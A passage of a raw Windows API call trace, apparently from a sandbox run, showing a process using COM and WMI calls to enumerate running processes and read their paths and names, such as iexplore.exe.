This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56ea0e0, puReturned=0x27bb39c | out: apObjects=0x56ea0e0*=0x595468, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.073] IUnknown:QueryInterface (in: This=0x595468, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x595468) returned 0x0 [0279.073] IUnknown:QueryInterface (in: This=0x595468, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.073] IUnknown:QueryInterface (in: This=0x595468, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.074] IUnknown:AddRef (This=0x595468) returned 0x3 [0279.074] IUnknown:QueryInterface (in: This=0x595468, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.074] IUnknown:QueryInterface (in: This=0x595468, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.074] IUnknown:QueryInterface (in: This=0x595468, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x59546c) returned 0x0 [0279.074] IMarshal:GetUnmarshalClass (in: This=0x59546c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.074] IUnknown:Release (This=0x59546c) returned 0x3 [0279.074] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.074] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.074] IUnknown:QueryInterface (in: This=0x595468, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.074] IUnknown:Release (This=0x595468) returned 0x2 [0279.074] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.074] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.074] IUnknown:QueryInterface (in: This=0x595468, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x595468) returned 0x0 [0279.074] IUnknown:AddRef (This=0x595468) returned 0x4 [0279.074] IUnknown:Release (This=0x595468) returned 0x3 [0279.074] IUnknown:Release (This=0x595468) returned 0x2 [0279.074] CoTaskMemFree (pv=0x56ea0e0) [0279.075] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.075] IUnknown:AddRef (This=0x595468) returned 0x3 [0279.075] IWbemClassObject:Get (in: This=0x595468, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.075] IWbemClassObject:Get (in: This=0x595468, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"396\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.075] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"396\"") returned 0x64 [0279.075] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"396\"") returned 0x64 [0279.075] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.075] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.075] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.075] IUnknown:Release (This=0x500344) returned 0x1 [0279.076] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56ea0e0) returned 0x0 [0279.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x56ea0e0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.077] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56ea0e0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a94f8) returned 0x0 [0279.077] WbemDefPath:IUnknown:Release (This=0x56ea0e0) returned 0x0 [0279.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a94f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a94f8) returned 0x0 [0279.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a94f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.077] WbemDefPath:IUnknown:AddRef (This=0x5a94f8) returned 0x3 [0279.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a94f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a94f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a94f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56ea0f0) returned 0x0 [0279.077] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56ea0f0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.077] WbemDefPath:IUnknown:Release (This=0x56ea0f0) returned 0x3 [0279.077] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.077] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a94f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.078] WbemDefPath:IUnknown:Release (This=0x5a94f8) returned 0x2 [0279.078] WbemDefPath:IUnknown:Release (This=0x5a94f8) returned 0x1 [0279.078] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.078] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a94f8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a94f8) returned 0x0 [0279.078] WbemDefPath:IUnknown:AddRef (This=0x5a94f8) returned 0x3 [0279.078] WbemDefPath:IUnknown:Release (This=0x5a94f8) returned 0x2 [0279.078] WbemDefPath:IWbemPath:SetText (This=0x5a94f8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"396\"") returned 0x0 [0279.078] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.078] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.078] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.078] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.078] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.078] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.078] IWbemClassObject:Get (in: This=0x595468, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27be608*=0, plFlavor=0x27be60c*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x27be608*=8, plFlavor=0x27be60c*=0) returned 0x0 [0279.078] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0279.078] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0279.078] IWbemClassObject:Get (in: This=0x595468, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27be608*=8, plFlavor=0x27be60c*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x27be608*=8, plFlavor=0x27be60c*=0) returned 0x0 [0279.078] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0279.078] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0279.078] CoTaskMemAlloc (cb=0x4) returned 0x56ea130 [0279.078] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56ea130, puReturned=0x27bb39c | out: apObjects=0x56ea130*=0x595600, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.079] IUnknown:QueryInterface (in: This=0x595600, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x595600) returned 0x0 [0279.079] IUnknown:QueryInterface (in: This=0x595600, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.079] IUnknown:QueryInterface (in: This=0x595600, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.080] IUnknown:AddRef (This=0x595600) returned 0x3 [0279.080] IUnknown:QueryInterface (in: This=0x595600, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.080] IUnknown:QueryInterface (in: This=0x595600, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.080] IUnknown:QueryInterface (in: This=0x595600, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x595604) returned 0x0 [0279.080] IMarshal:GetUnmarshalClass (in: This=0x595604, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.080] IUnknown:Release (This=0x595604) returned 0x3 [0279.080] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.080] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.080] IUnknown:QueryInterface (in: This=0x595600, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.080] IUnknown:Release (This=0x595600) returned 0x2 [0279.080] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.080] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.080] IUnknown:QueryInterface (in: This=0x595600, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x595600) returned 0x0 [0279.080] IUnknown:AddRef (This=0x595600) returned 0x4 [0279.080] IUnknown:Release (This=0x595600) returned 0x3 [0279.080] IUnknown:Release (This=0x595600) returned 0x2 [0279.080] CoTaskMemFree (pv=0x56ea130) [0279.081] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.081] IUnknown:AddRef (This=0x595600) returned 0x3 [0279.081] IWbemClassObject:Get (in: This=0x595600, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.081] IWbemClassObject:Get (in: This=0x595600, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2124\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.081] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2124\"") returned 0x66 [0279.081] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2124\"") returned 0x66 [0279.081] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.081] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.081] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.081] IUnknown:Release (This=0x500344) returned 0x1 [0279.082] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56ea130) returned 0x0 [0279.083] WbemDefPath:IUnknown:QueryInterface (in: This=0x56ea130, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.083] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56ea130, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a95d8) returned 0x0 [0279.083] WbemDefPath:IUnknown:Release (This=0x56ea130) returned 0x0 [0279.083] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a95d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a95d8) returned 0x0 [0279.083] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a95d8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.083] WbemDefPath:IUnknown:AddRef (This=0x5a95d8) returned 0x3 [0279.083] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a95d8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.083] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a95d8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.083] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a95d8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56ea140) returned 0x0 [0279.083] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56ea140, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.083] WbemDefPath:IUnknown:Release (This=0x56ea140) returned 0x3 [0279.083] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.084] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.084] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a95d8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.084] WbemDefPath:IUnknown:Release (This=0x5a95d8) returned 0x2 [0279.084] WbemDefPath:IUnknown:Release (This=0x5a95d8) returned 0x1 [0279.084] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.084] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.084] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a95d8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a95d8) returned 0x0 [0279.084] WbemDefPath:IUnknown:AddRef (This=0x5a95d8) returned 0x3 [0279.084] WbemDefPath:IUnknown:Release (This=0x5a95d8) returned 0x2 [0279.084] WbemDefPath:IWbemPath:SetText (This=0x5a95d8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2124\"") returned 0x0 [0279.084] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.084] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.084] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.084] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.084] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.084] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.084] IWbemClassObject:Get (in: This=0x595600, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bee7c*=0, plFlavor=0x27bee80*=0 | out: 